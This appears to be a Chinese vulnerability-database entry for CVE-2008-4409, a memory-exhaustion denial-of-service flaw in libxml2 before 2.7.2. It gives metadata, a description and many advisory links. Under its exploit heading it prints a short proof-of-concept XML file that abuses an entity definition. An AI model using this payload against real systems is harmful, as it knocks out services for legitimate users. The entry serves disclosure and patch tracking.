Libxml2预定义实体拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116313 漏洞类型 资源管理错误
发布时间 2008-10-02 更新时间 2009-06-23
CVE编号 CVE-2008-4409 CNNVD-ID CNNVD-200810-038
漏洞平台 Unix CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/32454
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-038
|漏洞详情
libxml2软件包提供允许用户操控XML文件的函数库,包含有读、修改和写XML和HTML文件支持。libxml2没有正确地处理实体中的预定义实体定义,如果用户受骗打开了恶意的XML文件的话,就可能导致耗尽所有内存,应用程序会崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/31555/info

The libxml2 library is prone to a denial-of-service vulnerability caused by an error when handling files using entities in entity definitions.

An attacker can exploit this issue to cause the library to consume an excessive amount of memory, denying service to legitimate users.

The issue affects libxml2 2.7 prior to 2.7.2. 

XML file:

<?xml version='1.0' ?>
<!DOCTYPE test [
<!ENTITY ampproblem '&'>
]>
<t a="&ampproblem;">a</t>
|参考资料

来源:FEDORA
名称:FEDORA-2008-8582
链接:https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00130.html
来源:FEDORA
名称:FEDORA-2008-8575
链接:https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00125.html
来源:XF
名称:libxml2-xml-file-dos(45633)
链接:http://xforce.iss.net/xforce/xfdb/45633
来源:VUPEN
名称:ADV-2009-1621
链接:http://www.vupen.com/english/advisories/2009/1621
来源:VUPEN
名称:ADV-2009-1522
链接:http://www.vupen.com/english/advisories/2009/1522
来源:BID
名称:31555
链接:http://www.securityfocus.com/bid/31555
来源:MANDRIVA
名称:MDVSA-2008:212
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2008:212
来源:support.apple.com
链接:http://support.apple.com/kb/HT3639
来源:support.apple.com
链接:http://support.apple.com/kb/HT3613
来源:GENTOO
名称:GLSA-200812-06
链接:http://security.gentoo.org/glsa/glsa-200812-06.xml
来源:SECUNIA
名称:35379
链接:http://secunia.com/advisories/35379
来源:SECUNIA
名称:32974
链接:http://secunia.com/advisories/32974
来源:SECUNIA
名称:32175
链接:http://secunia.com/advisories/321